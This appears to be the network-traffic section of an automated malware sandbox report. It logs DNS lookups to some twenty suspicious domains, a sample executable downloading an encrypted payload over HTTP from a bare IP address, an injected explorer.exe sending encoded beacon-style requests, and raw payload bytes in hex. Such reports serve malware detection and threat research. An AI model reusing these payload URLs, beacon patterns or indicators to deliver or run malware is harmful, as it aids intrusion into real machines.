Jul 5, 2023 14:12:50.836011887 CEST	62331	53	192.168.11.20	1.1.1.1
Jul 5, 2023 14:12:50.872189999 CEST	53	62331	1.1.1.1	192.168.11.20
Jul 5, 2023 14:12:52.882759094 CEST	61594	53	192.168.11.20	1.1.1.1
Jul 5, 2023 14:12:53.085073948 CEST	53	61594	1.1.1.1	192.168.11.20
Jul 5, 2023 14:13:09.878526926 CEST	59239	53	192.168.11.20	1.1.1.1
Jul 5, 2023 14:13:10.259448051 CEST	53	59239	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 5, 2023 14:07:06.148437023 CEST	192.168.11.20	9.9.9.9	0xbd17	Standard query (0)	www.josephajaogo.africa	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:07:07.161382914 CEST	192.168.11.20	1.1.1.1	0xbd17	Standard query (0)	www.josephajaogo.africa	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:07:07.577241898 CEST	192.168.11.20	9.9.9.9	0xbd17	Standard query (0)	www.josephajaogo.africa	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:07:26.751029968 CEST	192.168.11.20	9.9.9.9	0x8f2b	Standard query (0)	www.nisekopiraestate.net	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:07:46.965363979 CEST	192.168.11.20	1.1.1.1	0x3969	Standard query (0)	www.embhajeflexiveis.com	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:08:27.690854073 CEST	192.168.11.20	1.1.1.1	0x79dc	Standard query (0)	www.crossdressersespana.com	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:08:48.170726061 CEST	192.168.11.20	1.1.1.1	0x5eec	Standard query (0)	www.fetch-a-estudia-y-trabaja.info	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:09:08.713042021 CEST	192.168.11.20	1.1.1.1	0xc06e	Standard query (0)	www.icolut.xyz	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:09:28.911592960 CEST	192.168.11.20	1.1.1.1	0xb25c	Standard query (0)	www.enjoythearoma.com	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:09:49.578965902 CEST	192.168.11.20	1.1.1.1	0x4025	Standard query (0)	www.keyofcaiyla.com	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:10:11.745985031 CEST	192.168.11.20	1.1.1.1	0xe7c7	Standard query (0)	www.gota-africana.top	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:10:30.757507086 CEST	192.168.11.20	1.1.1.1	0xfbe5	Standard query (0)	www.2004256.com	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:10:51.627756119 CEST	192.168.11.20	1.1.1.1	0xd709	Standard query (0)	www.arctiquevarare.com	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:11:12.123373985 CEST	192.168.11.20	1.1.1.1	0x255c	Standard query (0)	www.kash-fitness.com	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:11:32.290600061 CEST	192.168.11.20	1.1.1.1	0x9b2f	Standard query (0)	www.1wisas.top	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:11:52.833197117 CEST	192.168.11.20	1.1.1.1	0xb7ea	Standard query (0)	www.akseki.net	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:12:13.016021013 CEST	192.168.11.20	1.1.1.1	0x834f	Standard query (0)	www.freightbyu.com	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:12:50.836011887 CEST	192.168.11.20	1.1.1.1	0x4eb9	Standard query (0)	www.immortal-civilization.com	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:12:52.882759094 CEST	192.168.11.20	1.1.1.1	0xb386	Standard query (0)	www.cristianlealojeda.com	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:13:09.878526926 CEST	192.168.11.20	1.1.1.1	0x33a2	Standard query (0)	www.largesxiaothose.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 5, 2023 14:07:07.576929092 CEST	1.1.1.1	192.168.11.20	0xbd17	Server failure (2)	www.josephajaogo.africa	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:07:08.608817101 CEST	9.9.9.9	192.168.11.20	0xbd17	Server failure (2)	www.josephajaogo.africa	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:07:10.192543983 CEST	9.9.9.9	192.168.11.20	0xbd17	Server failure (2)	www.josephajaogo.africa	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:07:26.765177965 CEST	9.9.9.9	192.168.11.20	0x8f2b	No error (0)	www.nisekopiraestate.net	webredir.vip.gandi.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 5, 2023 14:07:26.765177965 CEST	9.9.9.9	192.168.11.20	0x8f2b	No error (0)	webredir.vip.gandi.net		217.70.184.50	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:07:47.328978062 CEST	1.1.1.1	192.168.11.20	0x3969	No error (0)	www.embhajeflexiveis.com		103.169.142.0	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:08:27.709623098 CEST	1.1.1.1	192.168.11.20	0x79dc	No error (0)	www.crossdressersespana.com		217.160.0.102	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:08:48.495079994 CEST	1.1.1.1	192.168.11.20	0x5eec	No error (0)	www.fetch-a-estudia-y-trabaja.info	ssl1.prod.systemdragon.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 5, 2023 14:08:48.495079994 CEST	1.1.1.1	192.168.11.20	0x5eec	No error (0)	ssl1.prod.systemdragon.com		104.17.158.1	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:08:48.495079994 CEST	1.1.1.1	192.168.11.20	0x5eec	No error (0)	ssl1.prod.systemdragon.com		104.17.157.1	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:09:08.737606049 CEST	1.1.1.1	192.168.11.20	0xc06e	No error (0)	www.icolut.xyz		172.67.140.128	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:09:08.737606049 CEST	1.1.1.1	192.168.11.20	0xc06e	No error (0)	www.icolut.xyz		104.21.49.28	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:09:29.073396921 CEST	1.1.1.1	192.168.11.20	0xb25c	No error (0)	www.enjoythearoma.com		35.208.230.52	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:09:49.591669083 CEST	1.1.1.1	192.168.11.20	0x4025	Name error (3)	www.keyofcaiyla.com	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:10:12.306437969 CEST	1.1.1.1	192.168.11.20	0xe7c7	No error (0)	www.gota-africana.top	gota-africana.top		CNAME (Canonical name)	IN (0x0001)	false
Jul 5, 2023 14:10:12.306437969 CEST	1.1.1.1	192.168.11.20	0xe7c7	No error (0)	gota-africana.top		162.241.203.15	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:10:31.090182066 CEST	1.1.1.1	192.168.11.20	0xfbe5	No error (0)	www.2004256.com		160.124.149.176	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:10:51.651547909 CEST	1.1.1.1	192.168.11.20	0xd709	No error (0)	www.arctiquevarare.com	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 5, 2023 14:10:51.651547909 CEST	1.1.1.1	192.168.11.20	0xd709	No error (0)	parkingpage.namecheap.com		198.54.117.216	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:10:51.651547909 CEST	1.1.1.1	192.168.11.20	0xd709	No error (0)	parkingpage.namecheap.com		198.54.117.217	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:10:51.651547909 CEST	1.1.1.1	192.168.11.20	0xd709	No error (0)	parkingpage.namecheap.com		198.54.117.212	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:10:51.651547909 CEST	1.1.1.1	192.168.11.20	0xd709	No error (0)	parkingpage.namecheap.com		198.54.117.210	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:10:51.651547909 CEST	1.1.1.1	192.168.11.20	0xd709	No error (0)	parkingpage.namecheap.com		198.54.117.218	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:10:51.651547909 CEST	1.1.1.1	192.168.11.20	0xd709	No error (0)	parkingpage.namecheap.com		198.54.117.211	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:10:51.651547909 CEST	1.1.1.1	192.168.11.20	0xd709	No error (0)	parkingpage.namecheap.com		198.54.117.215	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:11:12.139378071 CEST	1.1.1.1	192.168.11.20	0x255c	Name error (3)	www.kash-fitness.com	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:11:32.659423113 CEST	1.1.1.1	192.168.11.20	0x9b2f	No error (0)	www.1wisas.top		190.115.19.43	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:11:52.867872000 CEST	1.1.1.1	192.168.11.20	0xb7ea	Name error (3)	www.akseki.net	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:12:13.044336081 CEST	1.1.1.1	192.168.11.20	0x834f	No error (0)	www.freightbyu.com	freightbyu.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 5, 2023 14:12:13.044336081 CEST	1.1.1.1	192.168.11.20	0x834f	No error (0)	freightbyu.com		76.223.105.230	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:12:13.044336081 CEST	1.1.1.1	192.168.11.20	0x834f	No error (0)	freightbyu.com		13.248.243.5	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:12:50.872189999 CEST	1.1.1.1	192.168.11.20	0x4eb9	Name error (3)	www.immortal-civilization.com	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:12:53.085073948 CEST	1.1.1.1	192.168.11.20	0xb386	No error (0)	www.cristianlealojeda.com		156.251.235.194	A (IP address)	IN (0x0001)	false
Jul 5, 2023 14:13:10.259448051 CEST	1.1.1.1	192.168.11.20	0x33a2	No error (0)	www.largesxiaothose.com		156.246.142.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

34.138.169.8

www.nisekopiraestate.net

www.embhajeflexiveis.com

www.crossdressersespana.com

www.fetch-a-estudia-y-trabaja.info

www.icolut.xyz

www.enjoythearoma.com

www.gota-africana.top

www.2004256.com

www.arctiquevarare.com

www.1wisas.top

www.freightbyu.com

www.cristianlealojeda.com

www.largesxiaothose.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	50281	34.138.169.8	80	C:\Users\user\Desktop\hi38VYWujz.exe

Timestamp	kBytes transferred	Direction	Data
Jul 5, 2023 14:06:25.128312111 CEST	47	OUT	GET /wp-content/themes/seotheme/IpOVHkNfbEqHd29.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0 Host: 34.138.169.8 Cache-Control: no-cache
Jul 5, 2023 14:06:25.271053076 CEST	49	IN	HTTP/1.1 200 OK Date: Wed, 05 Jul 2023 12:06:25 GMT Server: Apache/2.4.51 (Unix) OpenSSL/1.1.1n Last-Modified: Mon, 05 Jun 2023 01:19:34 GMT ETag: "2e440-5fd57b20231ea" Accept-Ranges: bytes Content-Length: 189504 Content-Type: application/octet-stream Data Raw: d5 4c 6c 17 95 b8 dd 44 35 a2 04 56 81 58 53 cf 0b 2f b8 c4 d8 f6 d0 fb 17 7c 9a a8 e3 ec 80 50 89 fe 82 9a 9e 25 a1 e2 9d 8e 2f 39 30 bb 52 ab a6 3d 12 96 4b 47 31 86 f4 85 be ab 46 6b 23 73 ae 5a 6c 15 21 61 1e 63 2b 0b 9e 11 d6 77 fe f2 a5 9c 98 c5 6f 65 3a 07 21 03 89 ae e2 76 bc c9 20 09 46 64 9e ed af 03 c3 02 42 d1 07 47 e4 fc b2 ef e5 b4 d2 e5 20 30 10 26 2d d6 7b ed 2d 2a a8 1c b8 58 fe f5 a4 2e f5 7f f6 56 c0 ea a2 56 17 cf 32 28 11 72 b2 79 d6 eb 92 a4 4d 37 5c 1d dd f9 c1 ba 5f fe e0 87 c0 3c 0a d5 21 a1 eb 49 4a e6 b8 24 b1 a7 7d b6 c9 76 1d 76 02 66 ee 3e b5 0a 54 84 22 9c 0f 5e fe 07 2f 52 9d 69 3f 9f ef 9b 98 57 7e 01 71 16 08 55 73 32 53 b7 bc 2d 16 9c 40 ac b2 f4 a1 6c 25 e5 af 3a 8e f3 21 79 d4 c6 e8 bb 37 ef 07 13 0b 2c 53 c1 34 6e b8 4c 33 47 0c 76 e4 d0 9f 0f 01 ba c0 e1 7b 7c fc 17 09 af e7 db 18 fa 47 a9 9e 85 b4 90 b7 c9 8e dc e0 a4 47 dd 21 36 b8 0a a2 87 45 8f 19 07 06 e0 30 a4 c0 44 3a 14 6c ef c4 0b 28 70 f7 bb cd 56 16 d1 37 f9 97 a6 93 62 a2 cd 8c 4a 7d 4d da 10 1a d1 c7 f5 08 63 e0 ff af f8 3d 42 b9 67 a6 5c 3e 10 1b eb 22 d3 d7 87 61 7c a1 28 17 31 3e de 22 66 59 30 4d 92 d8 a7 df 5f 3b c7 70 22 19 b0 2e 23 e8 1f c5 29 dc 1b c4 e1 e0 a7 ed cf e0 20 49 43 c5 e6 21 bd f5 37 2b 53 10 de 0b e6 29 9a f3 49 e4 e6 65 5d aa 56 73 fc 32 0a 4c 27 4c d5 fe 3a ad 43 07 b9 10 b1 10 3b 48 7c 6c ad fe 69 eb 05 84 cb a4 59 98 73 7d 3e 5f 6c a2 53 55 e2 49 f8 51 33 f2 b9 c3 66 51 9e fd 94 85 ce fc 0d 6d 2f 4c 0c be ef d2 c1 2d 21 53 23 53 e3 ad 28 2e 97 9c d1 76 22 92 57 31 ce f6 50 cc 4d 24 24 a5 e8 60 8c a9 6b 17 59 fc 1f 99 3e c3 7f 77 fc 16 d2 7f 45 08 bd 3d f8 55 6b 72 bf ec ad 41 22 e6 d2 e9 87 5a 91 12 b5 77 87 80 23 dc be 2f 16 96 e2 ff ba b6 06 3e 19 ff e5 9b e5 79 78 b5 9e f5 b6 e7 ca f5 38 ca 2a 44 db 79 9c 7f ac 45 f3 67 35 b7 85 93 6a a0 46 fe a6 0b bb ab 04 c9 f8 d3 e9 58 72 c7 ad 20 11 a0 63 c0 da 64 9e 9e 25 7a 2d 5c ba 49 d0 7c 58 ad 40 1f 8c d0 f6 58 e7 4b 57 48 b6 8e 52 7a f6 4e 07 01 1c b4 b7 8b 40 a5 a6 8b e9 aa 7b 70 3d 54 b2 1e 9f 94 65 7c ad 92 db e9 4c 9c 1c e2 ed ce da 09 f5 24 cb 51 b9 1a 79 bf 05 ac e6 84 13 8f f9 bb 5f 31 f7 8f 0d ca d3 ba c1 a1 03 ea 5d fe 8a e1 1a 60 15 bc f0 e7 da 6d 83 13 07 e5 98 53 6e 5f 32 06 b3 25 d3 c5 44 29 66 55 7b 20 5d 24 c0 ef 09 38 63 12 c5 ab 14 a6 11 20 45 ad 36 af 53 1f b7 da 36 40 28 5d 47 d7 c3 9a 4b 49 1e 44 52 a2 f5 20 d9 31 dc 5c b6 a3 be 68 7b 26 78 ef 16 48 40 33 d1 3a a0 f4 af bf d7 e8 e7 08 0a 40 d3 17 19 c5 be ed ad 81 2d ba 71 69 0d 3a fd f6 ed f0 4b 4c 4b e9 84 cb c0 49 eb e2 89 4a b6 7c 8b 25 c3 95 a4 dc 9f 7c 67 bf f4 cf ac ac 3b f6 8a b8 1f 35 39 36 5f 7d a7 4f a6 4f 80 8d 5f a4 3e 9f 62 55 37 1f 74 2a bf 6d 98 68 07 91 e5 66 c1 e0 46 70 31 bd 1b 73 2e 2f 36 0f cf da 1f 79 f5 c4 a4 63 6d 10 d6 29 6e ed b3 d6 11 6e 9c 30 0a 48 89 29 73 fb 90 c8 b2 b3 54 c6 12 96 e1 88 c5 74 00 e0 dc e8 c7 c1 fb a6 b2 0e ff 24 4b e0 03 03 7f f7 46 7b e0 89 46 a7 16 70 b9 76 00 24 94 0f 12 9e 2a 0e 51 f5 28 46 ad d3 65 7f cd 8a 2a 90 cf d4 a9 9b 12 88 84 dc da aa 77 22 9b 71 30 10 2a cc 9f 8c d3 91 21 ac 60 cf dc a8 c0 5d 3b 1d a2 81 3e 6d 11 Data Ascii: LlD5VXS/\|P%/90R=KG1Fk#sZl!ac+woe:!v FdBG 0&-{-X.VV2(ryM7\_<!IJ$}vvf>T"^/Ri?W~qUs2S-@l%:!y7,S4nL3Gv{\|GG!6E0D:l(pV7bJ}Mc=Bg\>"a\|(1>"fY0M_;p".#) IC!7+S)Ie]Vs2L'L:C;H\|liYs}>_lSUIQ3fQm/L-!S#S(.v"W1PM$$`kY>wE=UkrA"Zw#/>yx8DyEg5jFXr cd%z-\I\|X@XKWHRzN@{p=Te\|L$Qy_1]`mSn_2%D)fU{ ]$8c E6S6@(]GKIDR 1\h{&xH@3:@-qi:KLKIJ\|%\|g;596_}OO_>bU7tmhfFp1s./6ycm)nn0H)sTt$KF{Fpv$Q(Few"q0!`];>m
Jul 5, 2023 14:06:25.271128893 CEST	50	IN	Data Raw: 1f ac 3f f2 0d 04 12 d6 d4 f1 09 04 e0 18 76 15 bf e4 31 9c 2d 1d 99 b6 ed a8 fe 12 ae d6 e4 61 3e 30 06 46 14 b0 33 05 72 c4 d8 ee df b3 a6 b2 83 5c d7 6a a0 df 67 a4 0d d8 d1 92 67 8e a4 51 43 06 8f c4 23 e9 f3 d5 36 2a ea cd ac 8a c6 73 30 96 Data Ascii: ?v1-a>0F3r\jggQC#6s0]%n?/sg,%A2GnZ:K.VnNIv!1vjA]ir3W]A6Bm:x)2'8UkEw*'U$U
Jul 5, 2023 14:06:25.271184921 CEST	51	IN	Data Raw: d1 36 f9 97 a6 93 62 a7 cd 8d 4a 7d 4d da 10 1a 21 c5 f5 08 61 e0 ff af f8 3d 42 bb 67 e6 dd 3e 10 0b eb 22 c3 d7 87 61 7c b1 28 17 21 3e de 22 66 59 30 5d 92 d8 a7 df 5f 3b c7 70 22 19 b0 2e 23 e8 1f c5 29 dc 1b c4 e1 e0 a7 ed cf e0 20 49 43 c5 Data Ascii: 6bJ}M!a=Bg>"a\|(!>"fY0]_;p".#) IC!7+S)Ie]Vs2L'L:C;H\|liYs}>_lSUIQ3fQm/L-!S#S(.v"W(M$$9b{Y>owE=UkrABZw#/
Jul 5, 2023 14:06:25.271243095 CEST	52	IN	Data Raw: b8 e9 3c ed e2 71 4b 9a 6a c4 e4 d5 7f 32 1c e5 44 75 55 56 d2 24 f4 6f c8 b2 aa f0 3c 6f 98 9b fa dd e7 8d 44 b4 11 bc 8e 9e 18 13 c6 c1 3c 28 23 14 20 a4 dd 7a d3 25 9d 26 94 28 76 58 40 6b 70 ff f1 e6 48 cc 54 ce 44 80 c1 83 09 e2 f2 8d 1c 74 Data Ascii: <qKj2DuUV$o<oD<(# z%&(vX@kpHTDto&HTD h\hY$G]]zd} -<l`><.ul?^gcIou~/m-au$L$8\-}L3teR=.l
Jul 5, 2023 14:06:25.271297932 CEST	54	IN	Data Raw: 2e 78 b1 4c 8b c8 ee 29 d6 e5 b8 5b 5d 54 82 17 7d fa c1 9e a2 26 0f 19 8f b6 3a 1b ce 91 52 e5 01 92 78 5e bb 57 0d 9a 02 dd 74 63 ce 9d 71 c0 0c 88 46 6b 7c 0b 6b 63 65 62 f4 9d 2d a1 21 8b dd 11 cf 1d 1a cd 0e 51 f5 7e cd 9f 5a 10 93 46 f8 2e Data Ascii: .xL)[]T}&:Rx^WtcqFk\|kceb-!Q~ZF.$"BsEI_W!`DI+TG<Dz\3ct?f%Ppe$ei2]nhnZ9(=+-3^REt!\P^/[1?Oc,*N3w2
Jul 5, 2023 14:06:25.271351099 CEST	55	IN	Data Raw: 1f 21 10 8d 0b cf 54 69 7f 92 6b bb 67 e8 50 a7 95 4b 10 78 af aa 6f 1d 63 79 a2 eb 1c 00 50 03 77 33 ad 7d 93 ba 21 13 43 90 40 c8 10 a9 80 98 11 94 44 48 95 47 b3 09 24 2a 3a 6f 54 1e f4 66 f7 a4 ed 4d 10 3b 92 8d 54 18 24 b9 c5 7a d6 52 01 36 Data Ascii: !TikgPKxocyPw3}!C@DHG$*:oTfM;T$zR6kH+QXGp\|jPhThYBJ%4@P3!XQ,mi'XJ.K!pX'}B[e'{jTP:R/
Jul 5, 2023 14:06:25.271405935 CEST	56	IN	Data Raw: 40 b5 a6 02 00 c9 c0 77 c2 49 6e 09 c5 7a 1b 2e 2a 4f 62 e2 82 55 70 28 c0 e3 54 1b 66 29 d4 c5 d0 7d 76 ed 5d 81 a1 06 fe e6 2a f3 05 d7 59 cc 0b 79 16 3e 94 75 f1 a7 d1 b1 25 27 c8 34 d6 14 ef de fb 05 ff 56 c4 18 c7 54 52 a9 3e 49 66 f9 3d 55 Data Ascii: @wInz.ObUp(Tf)}v]Yy>u%'4VTR>If=U#Al+CH![2s\|\-6E*gebECMWb%KjzCmY/V`kKGD;+CnmVlC.SiPy]"Mir
Jul 5, 2023 14:06:25.271460056 CEST	58	IN	Data Raw: ab 49 5c fa a0 b2 a8 bf 6a 66 bf bf cc bb b3 62 81 68 3a a3 1f 18 f7 72 39 5d e3 de 40 c6 1a 52 7e 46 84 29 f0 ca bf 81 01 12 0f 96 3d f2 ce 43 4e 40 be 14 1d 3f 05 57 c2 4c a0 47 62 5b 23 88 d1 ef 4f 33 4a 24 5b c4 09 ec 14 3f fc fe b3 d3 8a 58 Data Ascii: I\jfbh:r9]@R~F)=CN@?WLGb[#O3J$[?XuN!h/UIxngWJNg_;>rL)-fCawmk6Y&%e"F*sGq}ox,D+%UT;`s1jJ_?lbS
Jul 5, 2023 14:06:25.271512032 CEST	59	IN	Data Raw: 82 d4 40 1c 5d 46 38 ce 4e c8 d6 c4 63 c8 30 df f6 87 b5 a6 34 68 86 bb fb bd 2e f9 e5 2e 70 75 6a 99 4d 2d 1a 16 3b c4 be ea 53 3b 14 d2 d5 69 82 f7 f0 39 c4 29 1a 2b 38 df c4 77 6e 31 bb f6 45 ed a7 45 93 62 d1 70 03 3e 3e d3 a6 96 cd 04 e6 64 Data Ascii: @]F8Nc04h..pujM-;S;i9)+8wn1EEbp>>dZuj^k,v9uTs2onVc3gJeD`oD/>^pxY!$Q)x*["Kyws#=\|e=TwF(\|
Jul 5, 2023 14:06:25.271567106 CEST	61	IN	Data Raw: 7c 9a d5 73 7a 02 9b d1 24 41 64 9e b8 54 65 d4 cb 4c b0 e7 22 6a c4 92 6d 58 45 df a0 ba 20 e6 11 27 ff 71 7d fd 35 fb 76 38 1a 9b f2 25 86 26 f5 c6 e7 52 5e 60 c0 01 58 5e dd 17 13 52 bb f1 2f 8e 88 5f 0a a1 9a 2f e3 d1 3c 77 e7 78 b6 69 7f f3 Data Ascii: \|sz$AdTeL"jmXE 'q}5v8%&R^`X^R/_/<wxi}jJFd<>j2sP!}lRzy4-zyQ` M.6H^dlV9G4E;"%Tml%4MNyfdbh=E&UDw!#i@
Jul 5, 2023 14:06:25.413697004 CEST	62	IN	Data Raw: 54 39 62 27 90 a4 bb a5 a1 04 62 31 70 dd 1d f5 4f 3d f6 f5 24 cb 62 e5 a2 7d 34 78 50 d5 dd 0b 4e 06 b3 d6 6c 03 04 50 3a 12 41 d1 20 e4 15 5d fe 8a 6a 66 d8 11 3d 13 18 da 6d 83 98 5b 7d 9c 92 a1 4f f3 cd bb 16 28 4e 19 c5 e7 b6 84 20 5d 24 4b Data Ascii: T9b'b1pO=$b}4xPNlP:A ]jf=m[}O(N ]$K<-LV..6sTCTx0/Z~]#?g^zFJ:4&4f9){y<qK@#BBx;G#\|g4WmCGDO#<:?&>sS;

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	50287	217.70.184.50	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jul 5, 2023 14:07:26.793879032 CEST	256	OUT	GET /be53/?oT5=4qNm2ZAzgWMrZOo7jvgkf6t6S1zohoxxGdlmv96XcHnPlRQdh59KN22s8WnNeaZqgwFd&v0Dd=aPFdKLwPWjPXZR-p HTTP/1.1 Host: www.nisekopiraestate.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 5, 2023 14:07:26.825927973 CEST	258	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 05 Jul 2023 12:07:26 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Language Data Raw: 61 63 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 6e 69 73 65 6b 6f 70 69 72 61 65 73 74 61 74 65 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 69 6e 64 65 78 2d 31 32 64 63 30 31 33 33 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 66 6f 6e 74 22 20 68 72 65 66 3d 22 66 6f 6e 74 73 2f 4d 6f 6e 74 73 65 72 72 61 74 2d 52 65 67 75 6c 61 72 2e 77 6f 66 66 32 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 32 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 66 6f 6e 74 22 20 68 72 65 66 3d 22 66 6f 6e 74 73 2f 4d 6f 6e 74 73 65 72 72 61 74 2d 53 65 6d 69 42 6f 6c 64 2e 77 6f 66 66 32 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 32 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 2f 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 50 61 72 6b 69 6e 67 50 61 67 65 2d 72 6f 6f 74 5f 6d 65 76 32 63 20 22 3e 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 2d 72 6f 6f 74 5f 31 41 71 45 5a 20 50 61 72 6b 69 6e 67 2d 72 6f 6f 74 5f 56 73 4c 6a 59 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 2d 77 72 61 70 70 65 72 5f 33 79 71 37 5a 22 3e 3c 61 72 74 69 63 6c 65 20 63 6c 61 73 73 3d 22 50 61 72 6b 69 6e 67 2d 63 6f 6e 74 65 6e 74 5f 32 79 57 4c 77 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 2d 74 69 74 6c 65 5f 6d 66 30 72 70 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 3c 2f 68 31 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 2d 74 65 78 74 5f 31 66 6d 63 56 20 50 61 72 6b 69 6e 67 2d 74 65 78 74 5f 46 47 44 6a 4d 22 3e 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 68 6f 69 73 2e 67 61 6e 64 69 2e 6e 65 74 2f 65 6e 2f 72 65 73 75 6c 74 73 3f 73 65 61 72 63 68 3d 6e 69 73 65 6b 6f 70 69 72 61 65 73 74 61 74 65 2e 6e 65 74 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 Data Ascii: acd<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" 